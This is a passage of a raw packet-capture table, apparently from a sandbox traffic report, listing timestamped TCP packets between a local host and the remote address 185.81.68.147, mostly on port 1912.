                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.327768087 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.327780962 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.327811956 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.327830076 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.327868938 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.327877998 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.327918053 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.327953100 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.328000069 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.330370903 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.330435991 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.400728941 CET8049746185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.446949959 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.447011948 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.447027922 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.447053909 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.447098970 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.447104931 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.447141886 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.447151899 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.447196960 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.447211027 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.447257996 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.447261095 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.447314024 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.447685957 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.447768927 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.447813034 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.447854042 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.447861910 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.447895050 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.447905064 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.447941065 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.447957039 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.447998047 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.448014975 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.448035002 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.448038101 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.448086023 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.448088884 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.448148012 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.453165054 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.453222990 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.573087931 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.573128939 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.573177099 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.573177099 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.573223114 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.573246002 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.573267937 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.573268890 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.573312044 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.573323965 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.573353052 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.573359966 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.573394060 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.573398113 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.573434114 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.573446989 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.573474884 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.573487043 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.573513985 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.573523045 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.573554039 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.573565960 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.573592901 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.573596001 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.573632956 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.573641062 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.573677063 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.573685884 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.573718071 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.573724985 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.573766947 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.575413942 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.575474977 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.693715096 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.693821907 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.693866014 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.694039106 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.694040060 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.695256948 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.695379972 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.695379972 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.695422888 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.695429087 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.695463896 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.695470095 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.695506096 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.695517063 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.695545912 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.695571899 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.695589066 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.695596933 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.695628881 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.695638895 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.695669889 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.695674896 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.695722103 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.695732117 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.695761919 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.695770979 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.695801973 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.695811987 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.695844889 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.695849895 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.695894957 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.813544035 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.813951015 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.814012051 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.814070940 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.814158916 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.814167976 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.814224005 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.815768957 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.815781116 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.815826893 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.815876961 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.815886021 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.815934896 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.815939903 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.815943956 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.815979004 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.816001892 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.816004038 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.816014051 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.816029072 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.816061974 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.816062927 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.816104889 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.816212893 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.816226959 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.816236973 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.816247940 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.816271067 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.816274881 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.816274881 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.816319942 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.933984041 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.934012890 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.934092045 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.934098959 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.934139967 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.934175968 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.934199095 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.935661077 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.935703039 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.935720921 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.935760975 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.935832024 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.935872078 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.935888052 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.935925961 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.935986042 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.936026096 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.936045885 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.936079025 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.936191082 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.936233044 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.936249018 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.936274052 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.936290026 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.936315060 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.936327934 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.936368942 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.936379910 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.936419964 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.936434984 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.936460972 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.936484098 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.936503887 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.936506033 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.936544895 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.936557055 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.936597109 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.054164886 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.054208040 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.054269075 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.054317951 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.054311991 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.054430008 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.055447102 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.055521011 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.055716038 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.055763006 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.055773020 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.055814981 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.056335926 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.056389093 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.056397915 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.056451082 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.056479931 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.056520939 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.056535006 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.056560993 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.056574106 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.056615114 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.056651115 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.056703091 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.056749105 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.056788921 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.056802034 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.056838989 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.056952000 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.056992054 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.057012081 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.057049990 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.057058096 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.057097912 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.057113886 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.057137966 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.057146072 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.057245016 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.174345970 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.174457073 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.174499989 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.174544096 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.174632072 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.174632072 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.175297022 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.175350904 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.175388098 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.175437927 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.175493956 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.175548077 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.175983906 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.176035881 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.176167965 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.176218987 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.176278114 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.176326036 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.176404953 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.176451921 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.176453114 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.176492929 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.176496029 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.176549911 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.176681995 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.176721096 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.176764011 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.176821947 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.176878929 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.176918030 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.177032948 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.177094936 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.177115917 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.177140951 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.177182913 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.177197933 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.177234888 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.177239895 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.177288055 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.294678926 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.294749022 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.294792891 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.294866085 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.294907093 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.295011997 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.295011997 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.295304060 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.295367002 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.295428038 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.295435905 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.295469046 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.295546055 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.295861006 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.296183109 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.296222925 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.296241999 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.296269894 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.296324015 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.296355009 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.296395063 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.296452045 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.296657085 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.296787977 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.296843052 CET497091912192.168.2.5185.81.68.147
